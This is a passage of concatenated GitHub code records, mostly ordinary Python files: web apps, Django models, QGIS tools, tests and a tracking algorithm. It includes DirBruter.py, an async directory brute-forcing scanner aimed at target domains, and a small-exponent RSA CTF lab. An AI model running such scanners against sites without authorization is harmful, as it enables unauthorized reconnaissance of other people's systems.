transform_data(dict_data):\n    \"\"\" Pre-process data from request data\n    \"\"\"\n    input_data = pd.DataFrame.from_dict(dict_data, orient='index').T\n    with open(\"pickle/preprocess.pkl\", \"rb\") as 
f:\n preprocessor = pickle.load(f)\n input_data = preprocessor.transform(input_data)\n \n return input_data\n\n\napp = Flask(EXPERIMENT_NAME)\napp.secret_key = os.urandom(24)\n\nmodel = load_model()\n\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef predict_form_endpoint():\n \"\"\"\n Prediction form endpoint\n \"\"\"\n model_list, brand_list = load_list()\n \n if request.method == \"POST\":\n record = {}\n record[\"brand\"] = request.form.get(\"brand\")\n record[\"model\"] = request.form.get(\"model\")\n record[\"vehicle_age\"] = int(request.form.get(\"vehicle_age\"))\n record[\"km_driven\"] = int(request.form.get(\"km_driven\"))\n record[\"seller_type\"] = request.form.get(\"seller_type\")\n record[\"fuel_type\"] = request.form.get(\"fuel_type\")\n record[\"transmission_type\"] = request.form.get(\"transmission\")\n record[\"mileage\"] = float(request.form.get(\"mileage\"))\n record[\"engine\"] = int(request.form.get(\"engine\"))\n record[\"max_power\"] = float(request.form.get(\"max_power\"))\n record[\"seats\"] = int(request.form.get(\"seats\"))\n \n input_data = transform_data(record)\n \n error_message = validate_data(record)\n if error_message:\n flash(error_message, 'info')\n else:\n selling_price = predict(model, input_data)\n flash(f\"is the market selling price of the Car model {record['model']}\", selling_price)\n\n return render_template(\"index.html\", model_list=model_list, brand_list=brand_list)\n\n\n@app.route(\"/predict\", methods=[\"POST\"])\ndef predict_json_endpoint():\n \"\"\"\n Prediction API endpoint\n \"\"\"\n record = request.get_json()\n\n error_message = validate_data(record)\n if error_message:\n return jsonify({\"Error\": error_message})\n\n selling_price = calculate_selling_price(record)\n return jsonify({\"selling_price\": selling_price})\n\n\nif __name__ == \"__main__\":\n app.run(debug=True, host=\"0.0.0.0\", port=8080)","repo_name":"aravind-selvam/mlflow-integrated-project","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":5820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25870205409","text":"import sys\n\nStop = (str())\n\nwhile Stop !=\"n\":\n \n Invoice_Date = (str(input(\"Enter Invoice Date / Bill Date \")))\n Program_Code = (str(input(\"Enter Program Code \")))\n Recipient_ID = (str(input(\"Enter Four Digit Recipient ID \")))\n Activity_Code = (str(input(\"Enter Activity Code \")))\n FPN = (str(input(\"Federal Project Number \")))\n Object_Class = (str(input(\"Enter Project Class \")))\n Demo_ID = (str(input(\"Enter Demo ID \")))\n Transaction_Type = (str(input(\"Enter Transaction Type \")))\n Amount = (str(input(\"Enter Amount \")))\n RPD = (str(input(\"Enter Requested Payment Date \")))\n\n\n print(Invoice_Date,\"|\",Program_Code,\"|\",Recipient_ID,\"|\",Activity_Code,\"|\",FPN,\"|\",Object_Class,\"|\",Demo_ID,\"|\",Transaction_Type,\"|\",Amount,\"|\",RPD,sep='',end ='\\n')\n \n original_stdout = sys.stdout \n \n with open('FHWA_Bill.txt', 'a+') as f:\n sys.stdout = f \n print(Invoice_Date,\"|\",Program_Code,\"|\",Recipient_ID,\"|\",Activity_Code,\"|\",FPN,\"|\",Object_Class,\"|\",Demo_ID,\"|\",Transaction_Type,\"|\",Amount,\"|\",RPD,sep='',end ='\\n')\n # Reset the standard output\n sys.stdout = original_stdout \n \n Stop = (str(input(\"would you like to enter another FHWA Bill? 
Y/N \")))\n","repo_name":"IncompleteString/FHWA_BIll_Gen","sub_path":"TBP.py","file_name":"TBP.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7924922266","text":"from django.conf.urls.defaults import *\n\n# Uncomment the next two lines to enable the admin:\n#from django.contrib import admin\n#admin.autodiscover()\n\nurlpatterns = patterns('accounts.views',\n # Example:\n (r'^$', 'index'),\n (r'^index.html', 'index'),\n (r'^exists.html', 'exists'),\n (r'^confirmation.html', 'confirmation'),\n (r'^confirmed.html', 'confirmed'),\n (r'^signup.html', 'signup'),\n (r'^login.html', 'login'),\n (r'^logout.html', 'logout'),\n (r'^confirm/(?P\\w+)$', 'confirm'),\n\n # Uncomment the admin/doc line below and add 'django.contrib.admindocs' \n # to INSTALLED_APPS to enable admin documentation:\n # (r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n # (r'^admin/(.*)', admin.site.root),\n)\n","repo_name":"mschenck/django-devel","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"33516035517","text":"from django.contrib.auth import get_user_model\nfrom django.db import models\n\nfrom store.models.store import Store\n\nUser = get_user_model()\n\n\nclass Address(models.Model):\n old_address = models.CharField(verbose_name='지번주소', max_length=100)\n address = models.CharField(verbose_name='도로명 주소', max_length=100)\n detail_address = models.CharField(verbose_name='상세주소', max_length=100, blank=True)\n # 위도, 경도 (정수 부분 4자리, 소수점 이하 자리수 6자리)\n # lat(latitude): 위도 lng(longitude): 경도\n lat = models.DecimalField(verbose_name='위도', max_digits=17, decimal_places=14)\n lng = models.DecimalField(verbose_name='경도', max_digits=17, decimal_places=14)\n user = models.ForeignKey(\n User,\n on_delete=models.SET_NULL,\n verbose_name='사용자',\n related_name='is_host_address_set',\n related_query_name='is_host_address',\n blank=True,\n null=True,\n )\n store = models.ForeignKey(\n Store,\n on_delete=models.SET_NULL,\n verbose_name='상점',\n related_name='is_store_address_set',\n related_query_name='is_store_address',\n blank=True,\n null=True,\n )\n created_at = models.DateTimeField(verbose_name='등록일', auto_now=True)\n\n class Meta:\n verbose_name = '주소'\n verbose_name_plural = f'{verbose_name} 목록'\n\n def __str__(self):\n return '{present} {detail}'.format(\n present=self.address,\n detail=self.detail_address,\n )\n","repo_name":"hanyonghee9264/TeamProject_FoodFly","sub_path":"app/address/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3219531231","text":"from typing import List\n\nfrom qgis.core import QgsFeatureRequest\n\nfrom qgis.PyQt.QtWidgets import QMessageBox\n\nfrom qgis.PyQt.QtCore import pyqtSignal\nfrom qgis.core import QgsPointXY, QgsCoordinateReferenceSystem, QgsRectangle\n\nfrom qgis.core import \\\n QgsVectorLayerTools, QgsVectorLayer, Qgis, \\\n QgsSettings, \\\n QgsVectorDataProvider, \\\n QgsFeature, QgsGeometry, QgsProject\n\nfrom qgis.gui import QgisInterface\n\nfrom .utils import SpatialExtent, SpatialPoint, featureBoundingBox\n\n\nclass VectorLayerTools(QgsVectorLayerTools):\n \"\"\"\n Implements QgsVectorLayerTools with some additional routines\n \"\"\"\n 
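# The class body below declares a set of pyqtSignal attributes. Minimal sketch of
# the declare/connect/emit pattern those signals follow (shown with plain PyQt5;
# the original file imports the QGIS-bundled qgis.PyQt equivalents):
from PyQt5.QtCore import QObject, pyqtSignal

class Notifier(QObject):
    message = pyqtSignal(str, int)  # declared on the class, bound per instance

notifier = Notifier()
notifier.message.connect(lambda text, level: print(level, text))
notifier.message.emit("edits saved", 0)  # prints: 0 edits saved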
sigMessage = pyqtSignal(str, str, Qgis.MessageLevel)\n sigEditingStarted = pyqtSignal(QgsVectorLayer)\n sigEditingStopped = pyqtSignal(QgsVectorLayer)\n sigFreezeCanvases = pyqtSignal(bool)\n sigZoomRequest = pyqtSignal(QgsCoordinateReferenceSystem, QgsRectangle)\n sigPanRequest = pyqtSignal(QgsCoordinateReferenceSystem, QgsPointXY)\n sigFlashFeatureRequest = pyqtSignal(QgsVectorLayer, list)\n\n def __init__(self, *args, **kwds):\n super(VectorLayerTools, self).__init__(*args, **kwds)\n pass\n\n def addFeature(self, layer: QgsVectorLayer,\n defaultValues: dict = dict(),\n defaultGeometry: QgsGeometry = None,\n f: QgsFeature = QgsFeature(),\n action_name: str = \"Add feature\") -> bool:\n \"\"\"\n This method should/will be called, whenever a new feature will be added to the layer.\n \"\"\"\n from .maptools import QgsFeatureAction\n a = QgsFeatureAction(action_name, f, layer, None, None)\n return a.addFeature(defaultValues)\n\n def startEditing(self, layer: QgsVectorLayer) -> bool:\n \"\"\"\n This will be called, whenever a vector layer should be switched to edit mode.\n \"\"\"\n if not isinstance(layer, QgsVectorLayer):\n return False\n\n if not layer.isEditable() and not layer.readOnly():\n\n if not (layer.dataProvider().capabilities() & QgsVectorDataProvider.EditingCapabilities):\n title = \"Start editing failed\"\n msg = \"Provider cannot be opened for editing\"\n self.sigMessage.emit(title, msg, Qgis.Information)\n return False\n layer.startEditing()\n if layer.isEditable():\n self.sigEditingStarted.emit(layer)\n return layer.isEditable()\n\n def cutSelectionToClipboard(self, layer: QgsVectorLayer):\n import qgis.utils\n if isinstance(layer, QgsVectorLayer) and layer.isEditable() and isinstance(qgis.utils.iface, QgisInterface):\n self.copySelectionToClipboard(layer)\n self.deleteSelection(layer)\n\n def copySelectionToClipboard(self, layer: QgsVectorLayer, attributes: list = None, featureIds: list = None):\n \"\"\"\n Copies selected features to the clipboard\n \"\"\"\n import qgis.utils\n\n if isinstance(layer, QgsVectorLayer) and isinstance(qgis.utils.iface, QgisInterface):\n qgis.utils.iface.copySelectionToClipboard(layer)\n\n def pasteFromClipboard(self, layer: QgsVectorLayer):\n import qgis.utils\n if isinstance(layer, QgsVectorLayer) and layer.isEditable() and isinstance(qgis.utils.iface, QgisInterface):\n qgis.utils.iface.pasteFromClipboard(layer)\n\n def invertSelection(self, layer: QgsVectorLayer):\n if isinstance(layer, QgsVectorLayer):\n layer.invertSelection()\n\n def removeSelection(self, layer: QgsVectorLayer):\n if isinstance(layer, QgsVectorLayer):\n layer.removeSelection()\n\n def selectAll(self, layer: QgsVectorLayer):\n if isinstance(layer, QgsVectorLayer):\n layer.selectAll()\n\n def deleteSelection(self, layer: QgsVectorLayer):\n if isinstance(layer, QgsVectorLayer) and layer.isEditable():\n context = QgsVectorLayer.DeleteContext(True, QgsProject.instance())\n layer.beginEditCommand('Features deleted')\n success, deleted_fids = layer.deleteSelectedFeatures(context)\n layer.endEditCommand()\n\n def toggleEditing(self, vlayer: QgsVectorLayer, allowCancel: bool = True) -> bool:\n \"\"\"\n Changes the editing state. 
Returns True if the change was successful.\n \"\"\"\n if not isinstance(vlayer, QgsVectorLayer):\n return False\n\n res: bool = True\n isEditable = vlayer.isEditable()\n isModified = vlayer.isModified()\n\n if isEditable:\n return self.stopEditing(vlayer, allowCancel=allowCancel)\n else:\n if not self.startEditing(vlayer):\n return False\n settings = QgsSettings()\n markerType = str(settings.value(\"qgis/digitizing/marker_style\", \"Cross\"))\n markSelectedOnly = bool(settings.value(\"qgis/digitizing/marker_only_for_selected\", True))\n\n # // redraw only if markers will be drawn\n if not markSelectedOnly or (vlayer.selectedFeatureCount() > 0\n and (markerType == \"Cross\" or markerType == \"SemiTransparentCircle\")):\n vlayer.triggerRepaint()\n\n return True\n\n def zoomToSelected(self, layer: QgsVectorLayer):\n if isinstance(layer, QgsVectorLayer) and layer.selectedFeatureCount() > 0:\n bbox = layer.boundingBoxOfSelected()\n ext = SpatialExtent(layer.crs(), bbox)\n self.sigZoomRequest[QgsCoordinateReferenceSystem, QgsRectangle].emit(ext.crs(), QgsRectangle(ext))\n\n def featureBoundingBox(self, layer: QgsVectorLayer, featureIds: List[int]):\n request = QgsFeatureRequest()\n request.setFilterFids(featureIds)\n request.setNoAttributes()\n return featureBoundingBox(layer.getFeatures(request))\n\n def zoomToFeatures(self, layer: QgsVectorLayer, featureIds: List[int]):\n bbox = self.featureBoundingBox(layer, featureIds)\n ext = SpatialExtent(layer.crs(), bbox)\n self.sigZoomRequest[QgsCoordinateReferenceSystem, QgsRectangle].emit(ext.crs(), ext)\n\n def panToFeatures(self, layer: QgsVectorLayer, featureIds: List[int]):\n bbox = self.featureBoundingBox(layer, featureIds)\n pt = SpatialPoint(layer.crs(), bbox.center())\n self.sigPanRequest[QgsCoordinateReferenceSystem, QgsPointXY].emit(pt.crs(), pt)\n\n def flashFeatures(self, layer: QgsVectorLayer, featureIds: List[int]):\n self.sigFlashFeatureRequest.emit(layer, featureIds)\n\n def panToSelected(self, layer: QgsVectorLayer):\n if isinstance(layer, QgsVectorLayer) and layer.selectedFeatureCount() > 0:\n bbox = layer.boundingBoxOfSelected()\n pt = SpatialPoint(layer.crs(), bbox.center())\n self.sigPanRequest[QgsCoordinateReferenceSystem, QgsPointXY].emit(pt.crs(), pt)\n\n def rollBackEdits(self, layer: QgsVectorLayer, leave_editable: bool = True, trigger_repaint: bool = False) -> bool:\n self.sigFreezeCanvases.emit(True)\n if not layer.rollBack():\n title = 'Error'\n text = 'Problems during rollback'\n result = False\n self.sigMessage.emit(title, text, Qgis.Critical)\n else:\n result = True\n self.sigFreezeCanvases.emit(False)\n if trigger_repaint:\n layer.triggerRepaint()\n return result\n\n def saveEdits(self, layer: QgsVectorLayer, leave_editable: bool = True, trigger_repaint: bool = False) -> bool:\n \"\"\"\n Should be called, when the features should be committed but the editing session is not ended.\n \"\"\"\n if not isinstance(layer, QgsVectorLayer):\n return False\n\n result = True\n if layer.isModified():\n if not layer.commitChanges():\n self.commitError(layer)\n result = False\n\n if trigger_repaint:\n layer.triggerRepaint()\n\n if leave_editable:\n layer.startEditing()\n\n return result\n\n def stopEditing(self, layer: QgsVectorLayer, allowCancel: bool) -> bool:\n \"\"\"\n Will be called, when an editing session is ended and the features should be committed.\n Returns True if the layers edit state was finished\n \"\"\"\n if not isinstance(layer, QgsVectorLayer):\n return False\n\n if layer.isModified():\n buttons = QMessageBox.Yes | 
QMessageBox.No\n if allowCancel:\n buttons = buttons | QMessageBox.Abort\n\n button = QMessageBox.question(None,\n 'Stop Editing',\n 'Do you want to save the changes to layer {}'.format(layer.name()),\n buttons)\n\n if button == QMessageBox.Abort:\n return False\n elif button == QMessageBox.Yes:\n self.saveEdits(layer, leave_editable=False, trigger_repaint=True)\n elif button == QMessageBox.No:\n self.rollBackEdits(layer, leave_editable=False, trigger_repaint=True)\n else:\n layer.commitChanges()\n if not layer.isEditable():\n self.sigEditingStopped.emit(layer)\n return not layer.isEditable()\n\n def commitError(self, layer: QgsVectorLayer):\n \"\"\"\n collects the layer's commit errors and emits the sigMessage with a warning.\n \"\"\"\n title = 'Commit Errors'\n\n info = \"Could not commit changes to layer {}\".format(layer.name())\n info += \"\\n\\n{}\".format('\\n '.join(layer.commitErrors()))\n\n self.sigMessage.emit(title, info, Qgis.Warning)\n","repo_name":"EnMAP-Box/qgispluginsupport","sub_path":"qps/vectorlayertools.py","file_name":"vectorlayertools.py","file_ext":"py","file_size_in_byte":9675,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"69905803448","text":"import asyncio\nimport os\nimport sys\nfrom asyncio import CancelledError\n\nimport aiohttp\nimport argparse\n\nfrom BaseObject import BaseObject\n\nclass DirBruter(BaseObject):\n\n def __init__(self):\n BaseObject.__init__(self)\n self.domains = []\n self.queryResult = {}\n\n args = self.argparser()\n # 生成主域名列表,待检测域名入队\n target = args.target\n self.threads = args.threads\n self.typeList = args.file.split(',')\n if not os.path.isfile(target):\n # target = 'http://' + target\n self.domains.append(target)\n elif os.path.isfile(target):\n with open(target, 'r+', encoding='utf-8') as f:\n for domain in f:\n domain = domain.strip()\n if not domain.startswith(('http://', 'https://')):\n self.domains.append(domain)\n\n self.headers = {}\n self.buildHeader()\n\n def argparser(self):\n \"\"\"\n 解析参数\n :return:参数解析结果\n \"\"\"\n parser = argparse.ArgumentParser(description='InfoScripts can help you collect target\\'s information',\n epilog='\\tUsage:\\npython3 ' + sys.argv[0] + \" --target www.baidu.com --file php,shell\")\n parser.add_argument('--target', '-t', help='A target like www.example.com or subdomains.txt', required=True)\n parser.add_argument('--file', '-f', help='The dict you chose to brute', required=True)\n\n args = parser.parse_args()\n return args\n\n def startQuery(self):\n try:\n tasks = []\n newLoop = asyncio.new_event_loop()\n asyncio.set_event_loop(newLoop)\n loop = asyncio.get_event_loop()\n\n for domain in self.domains:\n if os.path.exists(os.getcwd() + '/result/' + domain + '/') is False:\n os.mkdir(os.getcwd() + '/result/' + domain + '/')\n\n tasks.append(asyncio.ensure_future(self.dirBrute('http://' + domain, sem)))\n\n loop.run_until_complete(asyncio.wait(tasks))\n except KeyboardInterrupt:\n self.logger.info('[+]Break By User.')\n except CancelledError:\n pass\n\n self.writeResult()\n\n async def dirBrute(self, domain):\n \"\"\"\n \"\"\"\n\n self.queryResult[domain.replace('http://', '')] = {}\n self.queryResult[domain.replace('http://', '')]['200'] = []\n self.queryResult[domain.replace('http://', '')]['403'] = []\n\n for filename in self.typeList:\n with open(os.path.dirname(os.path.abspath(__file__)) + '/Config/Dir/' + filename + '.txt', 'r', encoding='utf-8') as fp:\n for row in fp.readlines():\n url = domain + row.strip()\n sem = 
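# Note on the throttling in this loop: a new Semaphore is created for every URL, so
# it never actually bounds concurrency (and startQuery still passes a sem argument
# that dirBrute no longer accepts). A minimal sketch of the intended pattern - one
# semaphore created once and shared by all request coroutines:
import asyncio

async def fetch(url, sem):
    async with sem:  # at most `limit` coroutines run this section concurrently
        await asyncio.sleep(0.1)  # stand-in for the aiohttp request
        return url

async def main(urls, limit=10):
    sem = asyncio.Semaphore(limit)  # shared across all tasks
    return await asyncio.gather(*(fetch(u, sem) for u in urls))

asyncio.run(main([f"http://example.com/{i}" for i in range(5)]))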
asyncio.Semaphore(self.threads)\n try:\n async with aiohttp.ClientSession(connector=aiohttp.TCPConnector()) as session:\n async with sem:\n # 设置禁止跳转\n async with session.get(url, timeout=20, headers=self.headers, allow_redirects=False) as req:\n await asyncio.sleep(1)\n if req.status == 200:\n self.queryResult[domain.replace('http://', '')]['200'].append(url)\n elif req.status == 403:\n self.queryResult[domain.replace('http://', '')]['403'].append(url)\n req.close()\n except CancelledError:\n pass\n except ConnectionResetError:\n pass\n except Exception as e:\n self.logger.info('[-]DirBruter: {} http请求失败'.format(domain))\n\n return None\n\n def writeResult(self):\n \"\"\"\n 保存结果\n :return:\n \"\"\"\n\n for domain in self.domains:\n with open(os.path.dirname(os.path.abspath(__file__)) + '/result/' + domain + \"/\" + 'dir-200' + '.txt', 'w') as fpResult:\n for row in self.queryResult[domain.replace('http://', '')]['200']:\n fpResult.write(row + '\\r\\n')\n\n with open(os.path.dirname(os.path.abspath(__file__)) + '/result/' + domain + \"/\" + 'dir-403' + '.txt', 'w') as fpResult:\n for row in self.queryResult[domain.replace('http://', '')]['403']:\n fpResult.write(row + '\\r\\n')\n\nif __name__ == '__main__':\n dirBrute = DirBruter()\n dirBrute.startQuery()","repo_name":"fatmo666/InfoScripts","sub_path":"DirBruter.py","file_name":"DirBruter.py","file_ext":"py","file_size_in_byte":4689,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"77"} +{"seq_id":"5430595558","text":"import pygame\nimport sys\nimport GameEntity\nimport ResourceManager\nimport SceneManager\nimport GameObject\nfrom SceneBase import SceneBase\nfrom BattleScene import BattleScene\nfrom MenuScene import MenuScene\n# from NewBattleScene import NewBattleScene\n\nclass StartScene(SceneBase):\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.title = GameObject.GameObject()\n\t\tself.titleBg = GameObject.GameObject()\n\t\tself.pressAnyKey = GameObject.GameObject()\n\t\tself.flag = False\n\n\n\n\tdef init(self):\n\t\tsuper().init()\n\t\tResourceManager.instance.load(\"Title\", \"image\", \"Title.png\")\n\t\tResourceManager.instance.load(\"TitleBg\", \"image\", \"TitleBg.png\")\n\t\tResourceManager.instance.load(\"PressAnyKey\", \"image\", \"PressAnyKey.png\")\n\t\tself.title.init(ResourceManager.instance.getResourceHandler(\"Title\"), (150, 100), (550, 260))\n\t\tself.titleBg.init(ResourceManager.instance.getResourceHandler(\"TitleBg\"), (0, 0), (800, 600))\n\t\tself.pressAnyKey.init(ResourceManager.instance.getResourceHandler(\"PressAnyKey\"), (300, 500), (200, 30))\n\n\n\n\tdef start(self):\n\t\tsuper().start()\n\n\n\n\tdef update(self, events):\n\t\tsuper().update(events)\n\t\tfor event in events:\n\t\t\t# print(event)\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tSceneManager.instance.switchScene(None)\n\n\t\t\tif event.type == pygame.MOUSEBUTTONDOWN or event.type == pygame.KEYDOWN:\n\t\t\t\tself.flag = True\n\n\t\t\tif (event.type == pygame.MOUSEBUTTONUP or event.type == pygame.KEYUP) and self.flag:\n\t\t\t\tSceneManager.instance.switchScene(MenuScene())\n\t\t\t\t# SceneManager.instance.switchScene(NewBattleScene())\n\n\n\n\tdef draw(self):\n\t\tsuper().draw()\n\t\tself.titleBg.draw(self.screen)\n\t\tself.title.draw(self.screen)\n\t\tself.pressAnyKey.draw(self.screen)\n\n\n\n\tdef 
destroy(self):\n\t\tsuper().destroy()\n\t\tResourceManager.instance.unload(\"Title\")\n\t\tResourceManager.instance.unload(\"TitleBg\")\n\t\tResourceManager.instance.unload(\"PressAnyKey\")\n\n","repo_name":"Vanishedphreeze/ValenciaSaga","sub_path":"StartScene.py","file_name":"StartScene.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39790339401","text":"import subprocess\nfrom PYME.IO import clusterIO\nimport tempfile\nimport os\nimport shutil\n#import unittest\nimport time\n\nproc = None\ntmp_root = None\n\ndef setup_module():\n global proc, tmp_root\n tmp_root = os.path.join(tempfile.gettempdir(), 'PYMEDataServer_TEST')\n os.makedirs(tmp_root)\n proc = subprocess.Popen('PYMEDataServer -r %s -f TEST' % tmp_root , shell=True)\n \n \ndef teardown_module():\n global proc, tmp_root\n #proc.send_signal(1)\n #time.sleep(1)\n proc.kill()\n \n shutil.rmtree(tmp_root)\n \n \ndef test_put():\n testdata = 'foo bar\\n'\n clusterIO.putFile('_testing/test.txt', testdata, 'TEST')\n retrieved = clusterIO.getFile('_testing/test.txt', 'TEST')\n \n assert testdata == retrieved\n \ndef test_putfiles_and_list():\n test_files = [('_testing/test_list/file_%d' % i, 'testing ... \\n') for i in range(10)]\n \n clusterIO.putFiles(test_files, 'TEST')\n \n listing = clusterIO.listdir('_testing/test_list/')\n \n assert(len(listing) == 10)\n\n\ndef test_double_put():\n \"\"\"Trying to put the same file twice should cause an error\"\"\"\n testdata = 'foo bar\\n'\n\n clusterIO.putFile('_testing/test_d.txt', testdata, 'TEST')\n \n try:\n clusterIO.putFile('_testing/test_d.txt', testdata, 'TEST')\n raise AssertionError('Second put attempt did not raise an error')\n except RuntimeError:\n #we want to generate this error\n pass\n \n #retrieved = clusterIO.getFile('test.txt', 'TEST')\n \n #assert testdata == retrieved\n \ndef test_aggregate_h5r():\n import numpy as np\n from PYME.IO import clusterResults\n testdata = np.ones(10, dtype=[('a', ' 0 :\n for id in book_ids:\n book = Book.objects.get(id=id)\n books.append(book)\n total_price += book.price\n return render(request, 'cart/show_carts.html',{'books':books,'total_price':total_price})\n messages.warning(request,'your cart is empty','warning')\n return redirect('book:home')\ndef add_cart(request,book_id):\n cart = Cart(request)\n cart.add(book_id)\n return redirect('cart:show_carts')","repo_name":"dfpj/book_shop","sub_path":"cart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27099721089","text":"class Solution:\n def subsets(self, nums: List[int]) -> List[List[int]]:\n if len(nums)==0:\n return [[]]\n tmp = self.subsets(nums[1:])\n ans = []\n for l in tmp:\n ans.append([nums[0]]+l)\n ans.append(l)\n return ans","repo_name":"0xtinyuk/LeetCode","sub_path":"Algorithms/78. Subsets.py","file_name":"78. 
Subsets.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16419495665","text":"#Importando socket\nimport socket\n\n# Definindo Host e porta do terminal.\nHOST = '127.0.0.2'\nPORT = 5000\n\n#Conectando os terminais.\n\nudp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\norig = (HOST, PORT)\nudp.bind(orig)\n\n# Adicionando Print para efeito estetico e de testes.\n\nprint(\"Sucesso ao iniciar TV, no aguardo de senhas!\\n\")\n\n# Criando condição para transformar senha em padrão Utf-8 e mostrar na tela, quando disponivel.\n\nwhile True:\n senha, cliente = udp.recvfrom(1024)\n senha = senha.decode('utf-8')\n\n print (senha)\n\n","repo_name":"WillianBatista19/SDII","sub_path":"visualizacao_TV.py","file_name":"visualizacao_TV.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34724628359","text":"from flask import Blueprint, jsonify, request\n\nfrom dao.mine_dao import MineDao\nfrom libs import cache\nfrom libs.cache import get_token_user_id\n\nmine_blue = Blueprint(\"mine_blue\", __name__)\n\n\n@mine_blue.route(\"/status/\", methods=[\"GET\", \"POST\"])\ndef oders():\n resp = request.get_json()\n if resp:\n token = resp.get('token')\n user_id = cache.get_token_user_id(token)\n dao = MineDao()\n data = dao.mine_query(user_id)\n if data:\n return jsonify({\n 'code': 200,\n 'msg': 'ok',\n 'data': data\n })\n return jsonify({\n 'code': 201,\n 'msg': '请求数据失败',\n })\n\n\n@mine_blue.route(\"/add/money/\", methods=(\"POST\",))\ndef add_view():\n token = request.args.get(\"token\", None)\n num_money = request.form.get('num_money')\n \n if token is None:\n return jsonify({\"code\": 201, \"msg\": \"token查询参数必须提供\"})\n u_id = get_token_user_id(token)\n dao = MineDao()\n \n bal = dao.query_balance(u_id)\n num = int(bal) + int(num_money)\n\n dao.add_balance(num, u_id)\n return jsonify({\"code\": 200, \"msg\": \"充值成功!\", \"data\": num})","repo_name":"yiguo901/yiguo_api","sub_path":"views/mine_view.py","file_name":"mine_view.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"44631666903","text":"#!/usr/bin/env python3\nimport json\nfrom Crypto.Util.number import *\n\n\ndef genkeys():\n e = 5\n while True:\n p, q = getPrime(512), getPrime(512)\n n, phi = p * q, (p - 1) * (q - 1)\n if GCD(e, phi) == 1:\n d = inverse(e, phi)\n return (n, e), (n, d)\n'''\nflag = open('flag', 'rb').read()\npub, priv = genkeys()\n\nn, e = pub\n\nmessage = b\"Let me sleep, just let me sleep. Maybe go to sleep. I want to go to sleep. When can I go to sleep.\" + flag\nm = bytes_to_long(message)\nc = pow(m, e, n)\n'''\n# open('data', 'w').write(json.dumps((n, e, c)))\nprefix = b\"Let me sleep, just let me sleep. Maybe go to sleep. I want to go to sleep. 
When can I go to sleep.\"","repo_name":"a127000555/CTF-writeup","sub_path":"2018_NTU_course/lab10/lab-2.py","file_name":"lab-2.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"42545173777","text":"#!/usr/bin/env python3\n\nfrom tqdm import tqdm, trange\nimport os.path, os\nimport numpy as np\nimport pandas as pd\nfrom numpy import array as arr\nfrom glob import glob\nfrom scipy import signal, stats\nfrom scipy.interpolate import splev, splrep\nfrom scipy.spatial.distance import cdist\nfrom scipy.spatial import cKDTree\nfrom scipy.special import logsumexp\nfrom collections import Counter\nfrom multiprocessing import cpu_count\nfrom multiprocessing import Pool, get_context\nimport pickle\n\nfrom .common import make_process_fun, natural_keys\n\n\ndef nan_helper(y):\n return np.isnan(y), lambda z: z.nonzero()[0]\n\n\ndef remove_dups(pts, thres=7):\n tindex = np.repeat(np.arange(pts.shape[0])[:, None], pts.shape[1], axis=1)*100\n pts_ix = np.dstack([pts, tindex])\n tree = cKDTree(pts_ix.reshape(-1, 3))\n\n shape = (pts.shape[0], pts.shape[1])\n pairs = tree.query_pairs(thres)\n indices = [b for a, b in pairs]\n\n if len(pairs) == 0:\n return pts\n\n i0, i1 = np.unravel_index(indices, shape)\n pts_out = np.copy(pts)\n pts_out[i0, i1] = np.nan\n\n return pts_out\n\ndef viterbi_path(points, scores, n_back=3, thres_dist=30):\n n_frames = points.shape[0]\n\n points_nans = remove_dups(points, thres=5)\n # points_nans[scores < 0.01] = np.nan\n\n num_points = np.sum(~np.isnan(points_nans[:, :, 0]), axis=1)\n num_max = np.max(num_points)\n\n particles = np.zeros((n_frames, num_max * n_back + 1, 3), dtype='float64')\n valid = np.zeros(n_frames, dtype='int64')\n for i in range(n_frames):\n s = 0\n for j in range(n_back):\n if i-j < 0:\n break\n ixs = np.where(~np.isnan(points_nans[i-j, :, 0]))[0]\n n_valid = len(ixs)\n particles[i, s:s+n_valid, :2] = points[i-j, ixs]\n particles[i, s:s+n_valid, 2] = scores[i-j, ixs] * np.power(2.0, -j)\n s += n_valid\n if s == 0:\n particles[i, 0] = [-1, -1, 0.001] # missing point\n s = 1\n valid[i] = s\n\n ## viterbi algorithm\n n_particles = np.max(valid)\n\n T_logprob = np.zeros((n_frames, n_particles), dtype='float64')\n T_logprob[:] = -np.inf\n T_back = np.zeros((n_frames, n_particles), dtype='int64')\n\n T_logprob[0, :valid[0]] = np.log(particles[0, :valid[0], 2])\n T_back[0, :] = -1\n\n for i in range(1, n_frames):\n va, vb = valid[i-1], valid[i]\n pa = particles[i-1, :va, :2]\n pb = particles[i, :vb, :2]\n\n dists = cdist(pa, pb)\n cdf_high = stats.norm.logcdf(dists + 2, scale=thres_dist)\n cdf_low = 